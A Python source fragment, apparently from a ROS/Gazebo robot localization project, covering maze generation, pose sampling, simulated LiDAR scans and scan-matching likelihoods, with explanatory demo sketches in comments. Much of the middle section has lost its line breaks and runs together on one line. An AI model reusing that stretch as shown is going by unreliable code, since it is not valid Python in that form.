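    #     return np.array([[np.cos(th), -np.sin(th), x],
    #                      [np.sin(th),  np.cos(th), y],
    #                      [0.0,         0.0,        1.0]])
    #
    # def hg_to_tuple_demo(T):                     # 3x3 homogeneous matrix -> (x, y, theta)
    #     return (T[0, 2], T[1, 2], np.arctan2(T[1, 0], T[0, 0]))
    #
    # def define_tf_demo(map_pose, odom_pose):     # map_T_odom so that map_T_odom @ odom_T_base = map_T_base
    #     return tuple_to_hg_demo(map_pose) @ np.linalg.inv(tuple_to_hg_demo(odom_pose))
    #
    # map_T_odom = define_tf_demo((1.0, 2.0, np.pi/2), (0.5, 0.0, 0.0))
    # new_odom = (0.7, 0.1, 0.1)                   # a later odometry reading
    # print(hg_to_tuple_demo(map_T_odom @ tuple_to_hg_demo(new_odom)))   # pose in the map frame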
odom_pose = (self.odom_pose.x, self.odom_pose.y, self.odom_pose.theta) # update from cbOdom odom_T_obs = tuple_to_hg(odom_pose) map_T_obs = np.dot(self.map_T_odom, odom_T_obs) map_pose = np.array(hg_to_tuple(map_T_obs), np.float32) self.map_pose.x = map_pose[0] self.map_pose.y = map_pose[1] self.map_pose.theta = map_pose[2] self.publish_dal_pose(self.map_pose.x, self.map_pose.y, self.map_pose.theta) t_elapse = time.time() - self.t_motion_init done = False fwd_err = 0 lat_err = 0 ang_err = 0 if self.action_str == "go_fwd": # go 1 step fwd fwd_check = self.fwd_clear() & self.fwd_clear_bottom() if fwd_check == False: self.pub_cmdvel.publish(self.twist_msg_stop) rospy.loginfo("Forward is Not Clear") done = True else: p_start = np.array([start_pose.x, start_pose.y]) p_goal = np.array([goal_pose.x, goal_pose.y]) p_now = np.array([self.map_pose.x, self.map_pose.y]) yaw_now = self.map_pose.theta fwd_err,lat_err,ang_err = transform(p_start,p_goal,p_now, yaw_now) if fwd_err > - self.fwd_err_margin: # done self.pub_cmdvel.publish(self.twist_msg_stop) done = True else: #go fwd_vel, ang_vel = control_law(fwd_err, lat_err, ang_err, t_elapse) self.twist_msg_move.linear.x = fwd_vel self.twist_msg_move.linear.y = 0 self.twist_msg_move.angular.z = ang_vel self.pub_cmdvel.publish(self.twist_msg_move) done = False elif self.action_str == "turn_left" or self.action_str == "turn_right": # turn # measure orientation error: ang_err = wrap(goal_pose.theta - self.map_pose.theta) fwd_err = 0 lat_err = 0 if np.abs(ang_err) > self.ang_err_margin: fwd_vel, ang_vel = control_law(fwd_err, lat_err, -ang_err, t_elapse) # ang_vel = np.clip(self.turn_gain*ang_err, -self.max_turn_rate, self.max_turn_rate) self.twist_msg_move.linear.x = fwd_vel self.twist_msg_move.linear.y = 0 self.twist_msg_move.angular.z = ang_vel self.pub_cmdvel.publish(self.twist_msg_move) done = False else: self.pub_cmdvel.publish(self.twist_msg_stop) done = True if self.args.verbose > 1: print ("fwd err: %.3f, lat err: %.3f, ang err(deg): %.2f"%( fwd_err, lat_err, math.degrees(ang_err))) return not done def teleport_turtle(self): if self.args.verbose>1: print("inside turtle teleportation") # if self.args.perturb > 0: self.current_pose.x = self.perturbed_goal_pose.x self.current_pose.y = self.perturbed_goal_pose.y self.current_pose.theta = self.perturbed_goal_pose.theta # pose = self.turtle_pose_msg # twist = self.turtle_twist_msg # msg = ModelState() # msg.model_name = self.robot_model_name # msg.pose = pose # msg.twist = twist # if self.args.verbose > 1: # print("teleport target = %f,%f"%(msg.pose.position.x, msg.pose.position.y)) # rospy.wait_for_service('/gazebo/set_model_state') # resp = self.set_model_state(msg) # while True: # rospy.wait_for_service("/gazebo/get_model_state") # loc = self.get_model_state(self.robot_model_name,'') # if np.abs(self.process_model_state(loc.pose) - self.process_model_state(msg.pose)).sum(): # break # if self.args.verbose > 1: # print("teleport result = %f,%f"%(loc.pose.position.x, loc.pose.position.y)) def set_maze_grid(self): # decide maze grids for each env # if self.args.maze_grids_range[0] == None: # pass # else: self.n_maze_grids = np.random.choice(self.args.n_maze_grids) self.hall_width = self.map_width_meter/self.n_maze_grids if self.args.thickness == None: self.obs_radius = 0.25*self.hall_width else: self.obs_radius = 0.5*self.args.thickness * self.hall_width def random_map(self): self.set_maze_grid() self.set_walls() self.map_for_LM = fill_outer_rim(self.map_for_LM, self.map_rows, self.map_cols) if 
self.args.distort_map: self.map_for_LM = distort_map(self.map_for_LM, self.map_rows, self.map_cols) self.map_for_LM = fill_outer_rim(self.map_for_LM, self.map_rows, self.map_cols) def random_box(self): #rooms_row: number of rooms in a row [a,b): a <= n < b #rooms_col: number of rooms in a col [a,b): a <= n < b kwargs = {'rooms_row':(2,3), 'rooms_col':(1,3), 'slant_scale':2, 'n_boxes':(1,8), 'thick':50, 'thick_scale':3} ps = PartitionSpace(**kwargs) # p_open : probability to have the doors open between rooms ps.connect_rooms(p_open=1.0) # set output map size self.map_for_LM = ps.get_map(self.map_rows,self.map_cols) def read_map(self): ''' set map_design (grid_rows x grid_cols), map_2d (map_rows x map_cols), map_for_RL for RL state (n_state_grids x n_state_grids) ''' self.map_for_LM = np.load(self.args.load_map) # self.map_for_pose = np.load(self.args.load_map_LM) # mdt = np.load(self.args.load_map_RL) # self.map_for_RL[0,:,:] = torch.tensor(mdt).float().to(self.device) def set_walls(self): ''' set map_design, map_2d, map_for_RL ''' if self.args.test_mode: map_file = os.path.join(self.args.test_data_path, "map-design-%05d.npy"%self.env_count) maze = np.load(map_file) else: if self.args.random_rm_cells[1]>0: low=self.args.random_rm_cells[0] high=self.args.random_rm_cells[1] num_cells_to_delete = np.random.randint(low, high) else: num_cells_to_delete = self.args.rm_cells if self.args.save_boundary == 'y': save_boundary = True elif self.args.save_boundary == 'n': save_boundary = False else: save_boundary = True if np.random.random()>0.5 else False maze_options = {'save_boundary': save_boundary, "min_blocks": 10} maze = generate_map(self.n_maze_grids, num_cells_to_delete, **maze_options ) for i in range(self.n_maze_grids): for j in range(self.n_maze_grids): if i < self.n_maze_grids-1: if maze[i,j]==1 and maze[i+1,j]==1: #place vertical self.set_a_wall([i,j],[i+1,j],self.n_maze_grids,horizontal=False) if j < self.n_maze_grids-1: if maze[i,j]==1 and maze[i,j+1] ==1: #place horizontal wall self.set_a_wall([i,j],[i,j+1],self.n_maze_grids,horizontal=True) if i>0 and i<self.n_maze_grids-1 and j>0 and j<self.n_maze_grids-1: if maze[i,j]==1 and maze[i-1,j] == 0 and maze[i+1,j]==0 and maze[i,j-1]==0 and maze[i,j+1]==0: self.set_a_pillar([i,j], self.n_maze_grids) def make_low_dim_maps(self): self.map_for_pose = cv2.resize(self.map_for_LM, (self.grid_rows, self.grid_cols),interpolation=cv2.INTER_AREA) self.map_for_pose = normalize(self.map_for_pose) self.map_for_pose = np.clip(self.map_for_pose, 0.0, 1.0) mdt = cv2.resize(self.map_for_LM,(self.args.n_state_grids,self.args.n_state_grids), interpolation=cv2.INTER_AREA) mdt = normalize(mdt) mdt = np.clip(mdt, 0.0, 1.0) self.map_for_RL[0,:,:] = torch.tensor(mdt).float().to(self.device) def clear_objects(self): # rows = 4 # cols =5 # steps = [0.4, 0.4] # for i,cyl in enumerate(self.cylinders): # name = cyl['name'] # msg = LinkState() # msg.link_name = name # msg.pose.position.x = -4 - steps[0]*(i//cols) # msg.pose.position.y = 5 + steps[1]*(i%cols) # rospy.wait_for_service('/gazebo/set_link_state') # self.set_link_state(msg) # rows = 5 # cols =20 # steps = [0.7, 0.2] # for i,wal in enumerate(self.walls): # name = wal['name'] # msg = LinkState() # msg.link_name = name # msg.pose.position.x = 4 + steps[0]*(i//cols) # msg.pose.position.y = -5 + steps[1]*(i%cols) # rospy.wait_for_service('/gazebo/set_link_state') # self.set_link_state(msg) # msg = ModelState() # msg.model_name = self.robot_model_name # msg.pose.position.x = 0 # msg.pose.position.y = -5 # 
rospy.wait_for_service('/gazebo/set_model_state') # self.set_model_state(msg) self.map_for_LM = np.zeros((self.map_rows, self.map_cols)) self.map_for_pose = np.zeros((self.grid_rows, self.grid_cols),dtype='float') # self.map_for_RL = torch.zeros((1,self.grid_rows, self.grid_cols),device=torch.device(self.device)) self.map_for_RL = torch.zeros((1,self.args.n_state_grids, self.args.n_state_grids),device=torch.device(self.device)) def set_a_pillar(self, a, grids): x=to_real(a[0], self.xlim, grids) y=to_real(a[1], self.ylim, grids) #rad = self.obs_radius if self.args.backward_compatible_maps: rad = 0.15 elif self.args.random_thickness: rad = np.random.normal(loc=self.obs_radius, scale=self.hall_width*0.25) rad = np.clip(rad, self.hall_width*0.25, self.hall_width*0.5) else: rad = self.obs_radius corner0 = [x+rad,y+rad] corner1 = [x-rad,y-rad] x0 = to_index(corner0[0], self.map_rows, self.xlim) y0 = to_index(corner0[1], self.map_cols, self.ylim) x1 = to_index(corner1[0], self.map_rows, self.xlim) y1 = to_index(corner1[1], self.map_cols, self.ylim) for ir in range(x0,x1+1): for ic in range(y0,y1+1): dx = to_real(ir, self.xlim, self.map_rows) - x dy = to_real(ic, self.ylim, self.map_cols) - y dist = np.sqrt(dx**2+dy**2) if dist <= rad: self.map_for_LM[ir,ic]=1.0 def set_a_wall(self,a,b,grids,horizontal=True): ax = to_real(a[0], self.xlim, grids) ay = to_real(a[1], self.ylim, grids) bx = to_real(b[0], self.xlim, grids) by = to_real(b[1], self.ylim, grids) # if horizontal: # yaw=math.radians(90) # else: # yaw=math.radians(0) #rad = self.obs_radius if self.args.backward_compatible_maps: rad = 0.1*np.ones(4) elif self.args.random_thickness: rad = np.random.normal(loc=self.obs_radius, scale=self.hall_width*0.25, size=4) rad = np.clip(rad, self.hall_width*0.1, self.hall_width*0.5) else: rad = self.obs_radius*np.ones(4) corner0 = [ax+rad[0],ay+rad[1]] corner1 = [bx-rad[2],by-rad[3]] x0 = to_index(corner0[0], self.map_rows, self.xlim) y0 = to_index(corner0[1], self.map_cols, self.ylim) if self.args.backward_compatible_maps: x1 = to_index(corner1[0], self.map_rows, self.xlim) y1 = to_index(corner1[1], self.map_cols, self.ylim) else: x1 = to_index(corner1[0], self.map_rows, self.xlim)#+1 y1 = to_index(corner1[1], self.map_cols, self.ylim)#+1 self.map_for_LM[x0:x1, y0:y1]=1.0 # x0 = to_index(corner0[0], self.grid_rows, self.xlim) # y0 = to_index(corner0[1], self.grid_cols, self.ylim) # x1 = to_index(corner1[0], self.grid_rows, self.xlim)+1 # y1 = to_index(corner1[1], self.grid_cols, self.ylim)+1 # self.map_for_pose[x0:x1, y0:y1]=1.0 def sample_a_pose(self): # new turtle location (random) check = True collision_radius = 0.50 while (check): turtle_can = range(self.grid_rows*self.grid_cols) turtle_bin = np.random.choice(turtle_can,1) self.true_grid.row = turtle_bin//self.grid_cols self.true_grid.col = turtle_bin% self.grid_cols self.true_grid.head = np.random.randint(self.grid_dirs) self.goal_pose.x = to_real(self.true_grid.row, self.xlim, self.grid_rows) self.goal_pose.y = to_real(self.true_grid.col, self.ylim, self.grid_cols) self.goal_pose.theta = wrap(self.true_grid.head*self.heading_resol) check = self.collision_fnc(self.goal_pose.x, self.goal_pose.y, collision_radius, self.map_for_LM) def place_turtle(self): # new turtle location (random) check = True cnt = 0 while (check): if cnt > 100: return False cnt += 1 turtle_can = range(self.grid_rows*self.grid_cols) turtle_bin = np.random.choice(turtle_can,1) self.true_grid.row = turtle_bin//self.grid_cols self.true_grid.col = turtle_bin% self.grid_cols 
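    # --- Standalone sketch (not part of this class): the grid <-> world conversions
    # (to_index / to_real) that place_turtle(), the drawing code, and the scan
    # simulation rely on. The real implementations come from this repo's utility
    # module and may differ in axis orientation; the *_demo versions below are
    # plausible equivalents shown only to make the indexing convention explicit:
    # to_index maps a metric coordinate into [0, num_cells), and to_real returns
    # the metric center of a cell.
    #
    # import numpy as np
    #
    # def to_index_demo(x, num_cells, lim):
    #     frac = (x - lim[0]) / float(lim[1] - lim[0])
    #     return int(np.clip(np.floor(frac * num_cells), 0, num_cells - 1))
    #
    # def to_real_demo(i, lim, num_cells):
    #     cell = (lim[1] - lim[0]) / float(num_cells)
    #     return lim[0] + (i + 0.5) * cell
    #
    # xlim = (-5.0, 5.0)
    # i = to_index_demo(1.3, 11, xlim)        # metric coordinate -> cell index
    # print(i, to_real_demo(i, xlim, 11))     # cell index -> metric cell center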
self.true_grid.head = np.random.randint(self.grid_dirs) self.goal_pose.x = to_real(self.true_grid.row, self.xlim, self.grid_rows) self.goal_pose.y = to_real(self.true_grid.col, self.ylim, self.grid_cols) self.goal_pose.theta = wrap(self.true_grid.head*self.heading_resol) check = self.collision_fnc(self.goal_pose.x, self.goal_pose.y, self.collision_radius, self.map_for_LM) check = True cnt = 0 while (check): if cnt > 100: return False cnt += 1 if self.args.init_error == "XY" or self.args.init_error == "BOTH": delta_x = (0.5-np.random.rand())*(self.xlim[1]-self.xlim[0])/self.grid_rows delta_y = (0.5-np.random.rand())*(self.ylim[1]-self.ylim[0])/self.grid_cols else: delta_x=0 delta_y=0 if self.args.init_error == "THETA" or self.args.init_error == "BOTH": delta_theta = (0.5-np.random.rand())*self.heading_resol else: delta_theta=0 self.perturbed_goal_pose.x = self.goal_pose.x+delta_x self.perturbed_goal_pose.y = self.goal_pose.y+delta_y self.perturbed_goal_pose.theta = self.goal_pose.theta+delta_theta check = self.collision_fnc(self.perturbed_goal_pose.x, self.perturbed_goal_pose.y, self.collision_radius, self.map_for_LM) if self.args.test_mode: pg_pose_file = os.path.join(self.args.test_data_path, "pg-pose-%05d.npy"%self.env_count) g_pose_file = os.path.join(self.args.test_data_path, "g-pose-%05d.npy"%self.env_count) pg_pose = np.load(pg_pose_file) g_pose = np.load(g_pose_file) self.goal_pose.theta = g_pose[0] self.goal_pose.x = g_pose[1] self.goal_pose.y = g_pose[2] if self.args.init_error == "XY" or self.args.init_error == "BOTH": self.perturbed_goal_pose.x = pg_pose[1] self.perturbed_goal_pose.y = pg_pose[2] else: self.perturbed_goal_pose.x = g_pose[1] self.perturbed_goal_pose.y = g_pose[2] if self.args.init_error == "THETA" or self.args.init_error == "BOTH": self.perturbed_goal_pose.theta = pg_pose[0] else: self.perturbed_goal_pose.theta = g_pose[0] if self.args.verbose > 1: print ('gt_row,col,head = %f,%f,%d'%(self.true_grid.row,self.true_grid.col,self.true_grid.head)) print('x_goal,y_goal,target_ori=%f,%f,%f'%(self.goal_pose.x,self.goal_pose.y,self.goal_pose.theta)) # self.turtle_pose_msg.position.x = self.goal_pose.x # self.turtle_pose_msg.position.y = self.goal_pose.y # yaw = self.goal_pose.theta # self.turtle_pose_msg.orientation = geometry_msgs.msg.Quaternion(*tf_conversions.transformations.quaternion_from_euler(0, 0, yaw)) self.teleport_turtle() self.update_true_grid() # self.update_current_pose() return True def reset_explored(self): # reset explored area to all 0's self.explored_space = np.zeros((self.grid_dirs,self.grid_rows, self.grid_cols),dtype='float') self.new_pose = False return def update_bel_list(self): guess = self.bel_grid # guess = np.unravel_index(np.argmax(self.belief.cpu().detach().numpy(), axis=None), self.belief.shape) if guess not in self.bel_list: self.new_bel = True self.bel_list.append(guess) if self.args.verbose > 2: print ("bel_list", len(self.bel_list)) else: self.new_bel = False def update_explored(self): if self.explored_space[self.true_grid.head,self.true_grid.row, self.true_grid.col] == 0.0: self.new_pose = True else: self.new_pose = False self.explored_space[self.true_grid.head,self.true_grid.row, self.true_grid.col] = 1.0 return def normalize_gtl(self): gt = self.gt_likelihood self.gt_likelihood_unnormalized = np.copy(self.gt_likelihood) if self.args.gtl_output == "softmax": gt = softmax(gt, self.args.temperature) # gt = torch.from_numpy(softmax(gt)).float().to(self.device) elif self.args.gtl_output == "softermax": gt = softermax(gt) # gt = 
torch.from_numpy(softmin(gt)).float().to(self.device) elif self.args.gtl_output == "linear": gt = np.clip(gt, 1e-5, 1.0) gt=gt/gt.sum() # gt = torch.from_numpy(gt/gt.sum()).float().to(self.device) # self.gt_likelihood = torch.tensor(gt).float().to(self.device) self.gt_likelihood = gt def get_gtl_cos_mp(self, ref_scans, scan_data, my_dirs, return_dict): chk_rad = 0.05 offset = 360.0/self.grid_dirs y= np.array(scan_data.ranges_2pi)[::self.args.pm_scan_step] y = np.clip(y, self.min_scan_range, self.max_scan_range) for heading in my_dirs: X = np.roll(ref_scans, -int(offset*heading),axis=2)[:,:,::self.args.pm_scan_step] gtl = np.zeros((self.grid_rows, self.grid_cols)) for i_ld in range(self.grid_rows): for j_ld in range(self.grid_cols): if self.collision_fnc(to_real(i_ld, self.xlim, self.grid_rows), to_real(j_ld, self.ylim, self.grid_cols), chk_rad, self.map_for_LM): # if self.map_for_pose[i_ld, j_ld]>0.4: gtl[i_ld,j_ld]=0.0 else: x = X[i_ld,j_ld,:] x = np.clip(x, self.min_scan_range, self.max_scan_range) gtl[i_ld,j_ld] = self.get_cosine_sim(x,y) ### return_dict[heading] = {'gtl': gtl} def get_gtl_cos_mp2(self, my_dirs, scan_data, return_dict): chk_rad = 0.05 offset = 360.0/self.grid_dirs y= np.array(scan_data.ranges_2pi)[::self.args.pm_scan_step] y = np.clip(y, self.min_scan_range, self.max_scan_range) for heading in my_dirs: X = np.roll(self.scans_over_map, -int(offset*heading), axis=2)[:,:,::self.args.pm_scan_step] gtl = np.zeros((self.grid_rows, self.grid_cols)) for i_ld in range(self.grid_rows): for j_ld in range(self.grid_cols): if self.collision_fnc(to_real(i_ld, self.xlim, self.grid_rows), to_real(j_ld, self.ylim, self.grid_cols), chk_rad, self.map_for_LM): # if self.map_for_pose[i_ld, j_ld]>0.4: gtl[i_ld,j_ld]=0.0 else: x = X[i_ld,j_ld,:] x = np.clip(x, self.min_scan_range, self.max_scan_range) gtl[i_ld,j_ld] = self.get_cosine_sim(x,y) ### return_dict[heading] = {'gtl': gtl} def get_gtl_corr_mp(self, ref_scans, my_dirs, return_dict, clip): chk_rad = 0.05 offset = 360/self.grid_dirs y= np.array(self.scan_data_at_unperturbed.ranges_2pi)[::self.args.pm_scan_step] y = np.clip(y, self.min_scan_range, self.max_scan_range) for heading in my_dirs: X = np.roll(ref_scans, -offset*heading,axis=2)[:,:,::self.args.pm_scan_step] gtl = np.zeros((self.grid_rows, self.grid_cols)) for i_ld in range(self.grid_rows): for j_ld in range(self.grid_cols): if self.collision_fnc(to_real(i_ld, self.xlim, self.grid_rows), to_real(j_ld, self.ylim, self.grid_cols), chk_rad, self.map_for_LM): # if self.map_for_pose[i_ld, j_ld]>0.4: gtl[i_ld,j_ld]=0.0 else: x = X[i_ld,j_ld,:] x = np.clip(x, self.min_scan_range, self.max_scan_range) gtl[i_ld,j_ld] = self.get_corr(x,y,clip=clip) ### return_dict[heading] = {'gtl': gtl} def get_gt_likelihood_cossim(self, ref_scans, scan_data): # start_time = time.time() manager = multiprocessing.Manager() return_dict = manager.dict() accum = 0 procs = [] for i_worker in range(min(self.args.n_workers, self.grid_dirs)): n_dirs = self.grid_dirs/self.args.n_workers if i_worker < self.grid_dirs % self.args.n_workers: n_dirs +=1 my_dirs = range(accum, accum+n_dirs) accum += n_dirs if len(my_dirs)>0: pro = multiprocessing.Process(target = self.get_gtl_cos_mp, args = [ref_scans, scan_data, my_dirs, return_dict]) procs.append(pro) [pro.start() for pro in procs] [pro.join() for pro in procs] gtl = np.ones((self.grid_dirs,self.grid_rows,self.grid_cols)) for i in range(self.grid_dirs): ret = return_dict[i] gtl[i,:,:] = ret['gtl'] return gtl # for i in range(self.grid_dirs): # ret = return_dict[i] # 
self.gt_likelihood[i,:,:] = ret['gtl'] # # self.gt_likelihood[i,:,:] = torch.tensor(ret['gtl']).float().to(self.device) def get_gt_likelihood_cossim2(self, scan_data): # start_time = time.time() manager = multiprocessing.Manager() return_dict = manager.dict() accum = 0 procs = [] for i_worker in range(min(self.args.n_workers, self.grid_dirs)): n_dirs = self.grid_dirs/self.args.n_workers if i_worker < self.grid_dirs % self.args.n_workers: n_dirs +=1 my_dirs = range(accum, accum+n_dirs) accum += n_dirs if len(my_dirs)>0: pro = multiprocessing.Process(target = self.get_gtl_cos_mp2, args = [my_dirs, scan_data, return_dict]) procs.append(pro) [pro.start() for pro in procs] [pro.join() for pro in procs] gtl = np.ones((self.grid_dirs,self.grid_rows,self.grid_cols)) for i in range(self.grid_dirs): ret = return_dict[i] gtl[i,:,:] = ret['gtl'] return gtl def get_gt_likelihood_corr(self, ref_scans, clip=0): # start_time = time.time() manager = multiprocessing.Manager() return_dict = manager.dict() accum = 0 procs = [] for i_worker in range(min(self.args.n_workers, self.grid_dirs)): n_dirs = self.grid_dirs/self.args.n_workers if i_worker < self.grid_dirs % self.args.n_workers: n_dirs +=1 my_dirs = range(accum, accum+n_dirs) accum += n_dirs if len(my_dirs)>0: pro = multiprocessing.Process(target = self.get_gtl_corr_mp, args = [ref_scans, my_dirs, return_dict, clip]) procs.append(pro) [pro.start() for pro in procs] [pro.join() for pro in procs] for i in range(self.grid_dirs): ret = return_dict[i] self.gt_likelihood[i,:,:] = ret['gtl'] # self.gt_likelihood[i,:,:] = torch.tensor(ret['gtl']).float().to(self.device) def get_cosine_sim(self,x,y): # numpy arrays. return sum(x*y)/np.linalg.norm(y,2)/np.linalg.norm(x,2) def get_corr(self,x,y,clip=1): mx=np.mean(x) my=np.mean(y) corr=sum((x-mx)*(y-my))/np.linalg.norm(y-my,2)/np.linalg.norm(x-mx,2) # return 0.5*(corr+1.0) if clip==1: return np.clip(corr, 0, 1.0) else: return 0.5*(corr+1.0) def get_a_scan(self, x_real, y_real, offset=0, scan_step=1, noise=0, sigma=0): #class member variables: map_rows, map_cols, xlim, ylim, min_scan_range, max_scan_range, map_2d row_hd = to_index(x_real, self.map_rows, self.xlim) # from real to hd col_hd = to_index(y_real, self.map_cols, self.ylim) # from real to hd scan = np.zeros(360) missing = np.random.choice(360, noise, replace=False) gaussian_noise = np.random.normal(scale=sigma, size=360) for i_ray in xrange(0,360, scan_step): theta = math.radians(i_ray)+offset if i_ray in missing: dist = np.inf else: dist = self.min_scan_range while True: if dist >= self.max_scan_range: dist = np.inf break x_probe = x_real + dist * np.cos(theta) y_probe = y_real + dist * np.sin(theta) # see if there's something i_hd_prb = to_index(x_probe, self.map_rows, self.xlim) j_hd_prb = to_index(y_probe, self.map_cols, self.ylim) if i_hd_prb < 0 or i_hd_prb >= self.map_rows: dist = np.inf break if j_hd_prb < 0 or j_hd_prb >= self.map_cols: dist = np.inf break if self.map_for_LM[i_hd_prb, j_hd_prb] >= 0.5: break dist += 0.01+0.01*(np.random.rand()) scan[i_ray]=dist+gaussian_noise[i_ray] return scan def get_a_scan_mp(self, range_place, return_dict, offset=0, scan_step=1, map_img=None, xlim=None, ylim=None): # print (os.getpid(), min(range_place), max(range_place)) for i_place in range_place: #class member variables: map_rows, map_cols, xlim, ylim, min_scan_range, max_scan_range, map_2d row_ld = i_place // self.grid_cols col_ld = i_place % self.grid_cols x_real = to_real(row_ld, xlim, self.grid_rows ) # from low-dim location to real y_real = 
            y_real = to_real(col_ld, ylim, self.grid_cols)  # from low-dim location to real
            row_hd = to_index(x_real, self.map_rows, xlim)  # from real to hd
            col_hd = to_index(y_real, self.map_cols, ylim)  # from real to hd
            scan = np.zeros(360)
            for i_ray in range(0, 360, scan_step):
                theta = math.radians(i_ray)+offset
                dist = self.min_scan_range
                while True:
                    if dist >= self.max_scan_range:
                        dist = np.inf
                        break
                    x_probe = x_real + dist * np.cos(theta)
                    y_probe = y_real + dist * np.sin(theta)
                    # see if there's something
                    i_hd_prb = to_index(x_probe, self.map_rows, xlim)
                    j_hd_prb = to_index(y_probe, self.map_cols, ylim)
                    if i_hd_prb < 0 or i_hd_prb >= self.map_rows:
                        dist = np.inf
                        break
                    if j_hd_prb < 0 or j_hd_prb >= self.map_cols:
                        dist = np.inf
                        break
                    if map_img[i_hd_prb, j_hd_prb] >= 0.5:
                        break
                    dist += 0.01+0.01*(np.random.rand())
                scan[i_ray] = dist
            # return scan
            return_dict[i_place] = {'scan': scan}

    # def get_synth_scan(self):
    #     # start_time = time.time()
    #     # place sensor at a location, then reach out in 360 rays all around it and record when each ray gets hit.
    #     n_places = self.grid_rows * self.grid_cols
    #     for i_place in range(n_places):
    #         row_ld = i_place // self.grid_cols
    #         col_ld = i_place % self.grid_cols
    #         x_real = to_real(row_ld, self.xlim, self.grid_rows)  # from low-dim location to real
    #         y_real = to_real(col_ld, self.ylim, self.grid_cols)  # from low-dim location to real
    #         scan = self.get_a_scan(x_real, y_real, scan_step=self.args.pm_scan_step)
    #         self.scans_over_map[row_ld, col_ld, :] = np.clip(scan, 1e-10, self.max_scan_range)
    #         if i_place % 10 == 0: print ('.')
    #     # print ('scans', time.time()-start_time)

    def get_synth_scan_mp(self, scans, map_img=None, xlim=None, ylim=None):
        # print (multiprocessing.cpu_count())
        # start_time = time.time()
        # place sensor at a location, then reach out in 360 rays all around it and record when each ray gets hit.
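        # --- Standalone sketch (not part of this class): the ray-marching idea used
        # by get_a_scan()/get_a_scan_mp(). For each bearing, step outward from the
        # sensor until a grid cell with occupancy >= 0.5 is hit or the maximum range
        # is exceeded; the travelled distance is the simulated LiDAR return. The
        # helper name and the tiny map below are made up for the example.
        #
        # import numpy as np
        #
        # def cast_ray_demo(occ, cell_size, origin_rc, theta, max_range, step=0.01):
        #     r0 = (origin_rc[0] + 0.5) * cell_size
        #     c0 = (origin_rc[1] + 0.5) * cell_size
        #     dist = 0.0
        #     while dist < max_range:
        #         r = int((r0 + dist * np.cos(theta)) // cell_size)
        #         c = int((c0 + dist * np.sin(theta)) // cell_size)
        #         if r < 0 or r >= occ.shape[0] or c < 0 or c >= occ.shape[1]:
        #             return np.inf                 # left the map: no return
        #         if occ[r, c] >= 0.5:
        #             return dist                   # hit an occupied cell
        #         dist += step
        #     return np.inf
        #
        # occ = np.zeros((10, 10))
        # occ[:, 7] = 1.0                           # a wall in column 7
        # print(cast_ray_demo(occ, 0.1, (5, 2), np.pi/2, 2.0))   # ray toward the wall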
n_places=self.grid_rows * self.grid_cols manager = multiprocessing.Manager() return_dict = manager.dict() procs = [] accum = 0 for worker in range(min(self.args.n_workers, n_places)): n_myplaces = n_places/self.args.n_workers if worker < n_places % self.args.n_workers: n_myplaces += 1 range_place = range(accum, accum+n_myplaces) accum += n_myplaces kwargs = {'scan_step': self.args.pm_scan_step, 'map_img':map_img, 'xlim':xlim, 'ylim':ylim} pro = multiprocessing.Process(target = self.get_a_scan_mp, args = [range_place, return_dict ], kwargs = kwargs) procs.append(pro) [pro.start() for pro in procs] [pro.join() for pro in procs] # scans = np.ndarray((self.grid_rows*self.grid_cols, 360)) for i_place in range(n_places): ### multi-processing rd = return_dict[i_place] scan = rd['scan'] # scans [i_place, :] = np.clip(scan, self.min_scan_range, self.max_scan_range) row_ld = i_place // self.grid_cols col_ld = i_place % self.grid_cols scans[row_ld, col_ld,:] = np.clip(scan, self.min_scan_range, self.max_scan_range) # self.scans_over_map[row_ld, col_ld,:] = np.clip(scan, self.min_scan_range, self.max_scan_range) def slide_scan(self): # slide scan_2d downward for self.front_margin_pixels, and then left/righ for collision radius self.scan_2d_slide = np.copy(self.scan_2d[0,:,:]) for i in range(self.front_margin_pixels): self.scan_2d_slide += shift(self.scan_2d_slide, 1, axis=0, fill=1.0) # self.scan_2d_slide = np.clip(self.scan_2d_slide,0.0,1.0) for i in range(self.side_margin_pixels): self.scan_2d_slide += shift(self.scan_2d_slide, +1, axis=1, fill=1.0) self.scan_2d_slide += shift(self.scan_2d_slide, -1, axis=1, fill=1.0) self.scan_2d_slide = np.clip(self.scan_2d_slide,0.0,1.0) def get_scan_2d_n_headings(self, scan_data, xlim, ylim): if self.args.verbose > 1: print('get_scan_2d_n_headings') data = scan_data if self.map_rows == None : return None, None if self.map_cols == None: return None, None O=self.grid_dirs N=self.map_rows M=self.map_cols scan_2d = np.zeros(shape=(O,N,M)) angles = np.linspace(data.angle_min, data.angle_max, data.ranges.size, endpoint=False) for i,dist in enumerate(data.ranges): for rotate in range(O): offset = 2*np.pi/O*rotate angle = offset + angles[i] if angle > math.radians(self.args.fov[0]) and angle < math.radians(self.args.fov[1]): continue if ~np.isinf(dist): x = (dist)*np.cos(angle) y = (dist)*np.sin(angle) n = to_index(x, N, xlim) m = to_index(y, M, ylim) if n>=0 and n<N and m>0 and m<M: scan_2d[rotate,n,m] = 1.0 rows1 = self.args.n_state_grids cols1 = self.args.n_state_grids rows2 = self.args.n_local_grids cols2 = rows2 center=self.args.n_local_grids/2 if self.args.binary_scan: scan_2d_low = np.ceil(normalize(cv2.resize(scan_2d[0,:,:], (rows1, cols1),interpolation=cv2.INTER_AREA))) else: scan_2d_low = normalize(cv2.resize(scan_2d[0,:,:], (rows1, cols1),interpolation=cv2.INTER_AREA)) return scan_2d, scan_2d_low def do_scan_2d_n_headings(self): if self.args.verbose > 1: print('get_scan_2d_n_headings') data = self.scan_data if self.map_rows == None : return if self.map_cols == None: return O=self.grid_dirs N=self.map_rows M=self.map_cols self.scan_2d = np.zeros(shape=(O,N,M)) angles = np.linspace(data.angle_min, data.angle_max, data.ranges.size, endpoint=False) for i,dist in enumerate(data.ranges): for rotate in range(O): offset = 2*np.pi/O*rotate angle = offset + angles[i] if angle > math.radians(self.args.fov[0]) and angle < math.radians(self.args.fov[1]): continue if ~np.isinf(dist): x = (dist)*np.cos(angle) y = (dist)*np.sin(angle) n = to_index(x, N, self.xlim) m = 
                    m = to_index(y, M, self.ylim)
                    if n >= 0 and n < N and m > 0 and m < M:
                        self.scan_2d[rotate, n, m] = 1.0
        rows1 = self.args.n_state_grids
        cols1 = self.args.n_state_grids
        rows2 = self.args.n_local_grids
        cols2 = rows2
        center = self.args.n_local_grids/2
        if self.args.binary_scan:
            self.scan_2d_low = np.ceil(normalize(cv2.resize(self.scan_2d[0,:,:], (rows1, cols1), interpolation=cv2.INTER_AREA)))
        else:
            self.scan_2d_low = normalize(cv2.resize(self.scan_2d[0,:,:], (rows1, cols1), interpolation=cv2.INTER_AREA))
        return

